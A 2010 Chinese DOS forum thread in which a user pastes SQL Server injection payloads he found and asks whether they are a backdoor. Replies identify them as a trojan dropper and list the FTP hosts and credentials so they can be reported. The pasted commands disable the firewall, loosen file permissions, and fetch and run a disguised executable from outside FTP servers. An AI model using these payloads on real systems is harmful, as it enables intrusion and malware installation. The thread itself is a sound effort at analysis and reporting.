中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » 请高手来说明这个是不是 批处理后门
作者:
标题: 请高手来说明这个是不是 批处理后门 上一主题 | 下一主题
gtszylcd
新手上路





积分 5
发帖 5
注册 2010-5-5
状态 离线
『楼 主』:  请高手来说明这个是不是 批处理后门

1:

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("net stop sharedaccess&echo open dajiji.2288.org>>cmd.txt&echo 84020>>cmd.txt&echo 8669>>cmd.txt&echo bin>>cmd.txt&echo get NVIDIA.mp3>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&if exist NVIDIA.mp3 copy NVIDIA.mp3 NVIDIA.exe &NVIDIA.exe&del cmd.txt. /q /f&del NVIDIA.exe&del NVIDIA.mp3&del mysql.exe /f /q")')

go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c cacls.exe cmd.exe /e /t /g everyone:F&cacls.exe ftp.exe /e /t /g everyone:F&net stop sharedaccess&echo open dajiji.2288.org>>cmd.txt&echo 84020>>cmd.txt&echo 8669>>cmd.txt&echo bin>>cmd.txt&echo get NVIDIA.mp3>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&if exist NVIDIA.mp3 copy NVIDIA.mp3 NVIDIA.exe &NVIDIA.exe&del cmd.txt. /q /f&del NVIDIA.exe&del NVIDIA.mp3&del mysql.exe /f /q")')

2:

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("net stop sharedaccess&echo open 218.29.97.134>>cmd.txt&echo 139>>cmd.txt&echo 741>>cmd.txt&echo bin>>cmd.txt&echo get NVIDIA.mp3>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&if exist NVIDIA.mp3 copy NVIDIA.mp3 NVIDIA.exe &NVIDIA.exe&del cmd.txt. /q /f&del NVIDIA.exe&del NVIDIA.mp3&del mysql.exe /f /q")')

go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c cacls.exe cmd.exe /e /t /g everyone:F&cacls.exe ftp.exe /e /t /g everyone:F&net stop sharedaccess&echo open 218.29.97.134>>cmd.txt&echo 139>>cmd.txt&echo 741>>cmd.txt&echo bin>>cmd.txt&echo get NVIDIA.mp3>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&if exist NVIDIA.mp3 copy NVIDIA.mp3 NVIDIA.exe &NVIDIA.exe&del cmd.txt. /q /f&del NVIDIA.exe&del NVIDIA.mp3&del mysql.exe /f /q'--

[ Last edited by gtszylcd on 2010-5-6 at 02:39 ]

2010-5-6 02:36
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
gtszylcd
新手上路





积分 5
发帖 5
注册 2010-5-5
状态 离线
『第 2 楼』:  

到底是什么意思 下载执行吗 .这里面是不是 存的 FTP帐号 加密码 在下载木马?请高手帮忙

2010-5-6 02:37
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
gtszylcd
新手上路





积分 5
发帖 5
注册 2010-5-5
状态 离线
『第 3 楼』:  

希望高手 详细讲解....

如 从IP 帐号密码 登陆 下载什么东西到什么地方 执行了什么

下面的又是什么意思

2010-5-6 02:40
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
gtszylcd
新手上路





积分 5
发帖 5
注册 2010-5-5
状态 离线
『第 4 楼』:  

没人来回答吗?

2010-5-6 12:04
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lotus516
高级用户

论坛上抢劫的


积分 551
发帖 246
注册 2006-9-21
状态 离线
『第 5 楼』:  

首先这绝对是一个木马性质的东西!

2010-5-6 12:20
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
gtszylcd
新手上路





积分 5
发帖 5
注册 2010-5-5
状态 离线
『第 6 楼』:  

他这个是不是用FTP登陆的吗

2010-5-6 12:53
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
HAT
版主





积分 9023
发帖 5017
注册 2007-5-31
状态 离线
『第 7 楼』:  

主要的目的就是从他的FTP站点下载木马程序并运行,用到FTP站点有以下两个:

地址:dajiji.2288.org
用户名:84020
密码:8669

地址:218.29.97.134
用户名:139
密码:741

楼主去举报一下这两个地址吧



2010-5-7 00:28
查看资料  发短消息 网志   编辑帖子  回复  引用回复

请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转:  



[ 联系联盟系统管理团队 - 中国DOS联盟 ]

Sponsored by ifanr Inc | © 2001-2023